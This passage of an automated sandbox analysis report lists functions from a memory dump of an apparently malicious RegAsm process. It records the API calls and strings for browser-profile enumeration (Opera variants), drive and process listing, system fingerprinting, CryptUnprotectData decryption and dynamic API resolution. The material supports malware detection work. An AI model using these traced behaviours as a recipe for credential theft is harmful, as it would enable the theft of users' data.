Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00000000,00000000,?,\*.*,?,?,00427ACE,00000000,?,00000005), ref: 0040B242
StrCmpCA.SHLWAPI(?,00427D0C), ref: 0040B2CC
StrCmpCA.SHLWAPI(?,00427D10), ref: 0040B2E6
StrCmpCA.SHLWAPI(00000000,Opera,00427ADB,00427ADA,00427AD7,00427AD6,00427AD3,00427AD2,00427ACF), ref: 0040B37B
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040B393
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040B3AB

Strings

Opera GX, xrefs: 0040B385
Opera, xrefs: 0040B36A
\*.*, xrefs: 0040B1F9
Opera Crypto, xrefs: 0040B39D
;, xrefs: 0040BB28

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: ;$Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1922906172
Opcode ID: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction ID: 9690fecaf8c131b8b47e39c0c5a29481523bcde2650c36add3c71b8764175778
Opcode Fuzzy Hash: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction Fuzzy Hash: 0F524E30915248EACB15EBA5C955BDDBBB45F19304F5040BEE905B32C2EF781B4CCBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 810fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00424344,?,004020E0,?,00424340,?,00000000,00000000,?,00000000), ref: 00401466
StrCmpCA.SHLWAPI(?,00424348), ref: 004014EC
StrCmpCA.SHLWAPI(?,0042434C), ref: 00401506

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

\*.*, xrefs: 00401362
@6, xrefs: 00401951, 00401954
&, xrefs: 00401D81

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstFolderPathlstrcat
String ID: &$\*.*$ @6
API String ID: 2051144152-2842159198
Opcode ID: 2a697e87ca50838bebfaef3de145184342a7f269887f1d42eb97d1178b5c56e6
Instruction ID: 44408c539f998d041f733f93c1a77994a807b49ce5d211e6c2eeeb93df41b793
Opcode Fuzzy Hash: 2a697e87ca50838bebfaef3de145184342a7f269887f1d42eb97d1178b5c56e6
Instruction Fuzzy Hash: 0A725D70811288EACB15E7A5C955BDDBBB85F29308F5440AEE905732C2DF781B4CCB7A

Uniqueness

Uniqueness Score: -1.00%

Function 1C264CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1C264EE1

Strings

psow, xrefs: 1C2651F5
exclusive, xrefs: 1C264E81
winOpen, xrefs: 1C265110
delayed %dms for lock/sharing conflict at line %d, xrefs: 1C264FB5

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: fff433145b8a70700d56c9659f6668eeec5c1e30df2401dd56f2522d83a63e16
Instruction ID: d9f7bcc17e1499908f65f77fc13a1f609abf9e68fceb8e2a8a0121d52816f4e0
Opcode Fuzzy Hash: fff433145b8a70700d56c9659f6668eeec5c1e30df2401dd56f2522d83a63e16
Instruction Fuzzy Hash: B2F1A0B1A09322CBE718CF28C885B5B77F5BB58304F204929FD86D6691D735D984CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00416BB0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 180stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416C29
memset.MSVCRT ref: 00416C4E
GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00416C57
lstrcpy.KERNEL32(?,00000000), ref: 00416C76
lstrcpy.KERNEL32(?,00000000), ref: 00416C94
lstrcpy.KERNEL32(?,00000000), ref: 00416CB7
lstrlen.KERNEL32(00000000), ref: 00416D21

Strings

%DRIVE_REMOVABLE%, xrefs: 00416C7D
*%DRIVE_REMOVABLE%*, xrefs: 00416BFA
%DRIVE_FIXED%, xrefs: 00416C9B
*%DRIVE_FIXED%*, xrefs: 00416BD4

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 1884655365-147700698
Opcode ID: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction ID: fe13885b78f3290ecd7d39ef56567dba2d5f472473329e8ca487ae6efe04297a
Opcode Fuzzy Hash: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction Fuzzy Hash: 74619071600244ABDB31EF61CC45FEE7769EF05704F60412EBA1967182DF7C6A88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004103D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction ID: 32467d17135c4381fdee801ccc49f121a9f7beaa17eb491a29c7cc63036ba799
Opcode Fuzzy Hash: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction Fuzzy Hash: 89319371900119EBCB10DFD5DC85BEEB7B9FB08704F50406EF209A3281DBB85A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
HeapAlloc.KERNEL32(00000000), ref: 00410378
GetTimeZoneInformation.KERNEL32(?), ref: 00410387
wsprintfA.USER32 ref: 004103B2

Strings

wwww, xrefs: 00410398

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 362916592-671953474
Opcode ID: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction ID: 44720081d5bfcf4de0b039264fe6252f71ebe3c074e5847fe516a4db065da787
Opcode Fuzzy Hash: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction Fuzzy Hash: D4F02774B00214ABD72C6B689C1EFAE7B1E8B82211F444355FE06CB2C0EAB00C1486D5

Uniqueness

Uniqueness Score: -1.00%

Function 00410B00 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Process32Next.KERNEL32(00000000,00000128), ref: 00410B71

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
CloseHandle.KERNEL32(00000000), ref: 00410BE9

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 562399079-0
Opcode ID: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction ID: 6e6253c0bc7aca0069297d9a5e7774d33834fdaa728087442e1970efbb29e10a
Opcode Fuzzy Hash: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction Fuzzy Hash: BA21A271A00118EBCB10DFE5DC44BEEB7BCBB49B14F50416EF505A3281DBB85A498B64

Uniqueness

Uniqueness Score: -1.00%

Function 00411C50 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C89
Process32First.KERNEL32(00000000,00000128), ref: 00411C99
Process32Next.KERNEL32(00000000,00000128), ref: 00411CAB
StrCmpCA.SHLWAPI(?,?), ref: 00411CC0
CloseHandle.KERNEL32(00000000), ref: 00411CE2

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction ID: 08e3f1599d3a10f929bed3b41f19ba99720e1616bff5518888d5ac45308be21b
Opcode Fuzzy Hash: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction Fuzzy Hash: CD11BF76A01518ABC721CF89DC44BDEFBB9FB86710F204296FA05D3250D7345A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00410449 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
String ID: /
API String ID: 3280604673-4001269591
Opcode ID: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction ID: 18608df84cbcd0239a302a1ab97b581227ab4f7f43221c1533691961591ac6d2
Opcode Fuzzy Hash: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction Fuzzy Hash: 53116031A00119EACB14DBD4D885BFDB7B9BF18304F1400AEF609B3182DBB85AC4CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406F90 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
LocalFree.KERNEL32(?), ref: 00406FEE

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction ID: 09355a3e94bf7739add38d711f9a133fcae8b2d8c69785aff26ce7a8339e2a5e
Opcode Fuzzy Hash: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction Fuzzy Hash: 3B01E17960020AAFDB14DFA9DC55FAE77B9EF88B00F104559FA05AB380D675ED00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410280 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 0041028C
HeapAlloc.KERNEL32(00000000,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 00410293
GetUserNameA.ADVAPI32(00000000,01562EF0), ref: 004102A7

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction ID: 9804d81a03a056e57ee932ac7c1dbb4061c4f1b1a4941ccfe0fe277252d65891
Opcode Fuzzy Hash: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction Fuzzy Hash: EED012B5541219BBD7109BD49C4DADB7BADDB0A751F501192FB05D3240D5F0590087E1

Uniqueness

Uniqueness Score: -1.00%

Function 004105A0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004105AD
wsprintfA.USER32 ref: 004105C3

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction ID: 02812af920acb22cdc7078cfa6f9a81c02f6a6398f02c401a58ac9223811f8c5
Opcode Fuzzy Hash: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction Fuzzy Hash: 81D0C2B980010C97C710DB90EC859E9B3BCAB04200F404295EF04A3180E7756A1DCAE5

Uniqueness

Uniqueness Score: -1.00%

Function 00418CB0 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01562B00), ref: 00418CC5
GetProcAddress.KERNEL32(74DD0000,015629A0), ref: 00418CDD
GetProcAddress.KERNEL32(74DD0000,0156DD58), ref: 00418CF6
GetProcAddress.KERNEL32(74DD0000,0156DDD0), ref: 00418D0E
GetProcAddress.KERNEL32(74DD0000,0156DB18), ref: 00418D26
GetProcAddress.KERNEL32(74DD0000,0156DDE8), ref: 00418D3F
GetProcAddress.KERNEL32(74DD0000,01563F30), ref: 00418D57
GetProcAddress.KERNEL32(74DD0000,0156DBF0), ref: 00418D6F
GetProcAddress.KERNEL32(74DD0000,0156DC98), ref: 00418D88
GetProcAddress.KERNEL32(74DD0000,0156DC68), ref: 00418DA0
GetProcAddress.KERNEL32(74DD0000,0156DB30), ref: 00418DB8
GetProcAddress.KERNEL32(74DD0000,01562B20), ref: 00418DD1
GetProcAddress.KERNEL32(74DD0000,015626C0), ref: 00418DE9
GetProcAddress.KERNEL32(74DD0000,01562780), ref: 00418E01
GetProcAddress.KERNEL32(74DD0000,01562940), ref: 00418E1A
GetProcAddress.KERNEL32(74DD0000,0156DB48), ref: 00418E32
GetProcAddress.KERNEL32(74DD0000,0156DB60), ref: 00418E4A
GetProcAddress.KERNEL32(74DD0000,015642A0), ref: 00418E63
GetProcAddress.KERNEL32(74DD0000,01562740), ref: 00418E7B
GetProcAddress.KERNEL32(74DD0000,0156DBA8), ref: 00418E93
GetProcAddress.KERNEL32(74DD0000,0156DBC0), ref: 00418EAC
GetProcAddress.KERNEL32(74DD0000,0156DBD8), ref: 00418EC4
GetProcAddress.KERNEL32(74DD0000,0156DE18), ref: 00418EDC
GetProcAddress.KERNEL32(74DD0000,01562660), ref: 00418EF5
GetProcAddress.KERNEL32(74DD0000,0156DE60), ref: 00418F0D
GetProcAddress.KERNEL32(74DD0000,0156DE30), ref: 00418F25
GetProcAddress.KERNEL32(74DD0000,0156DE78), ref: 00418F3E
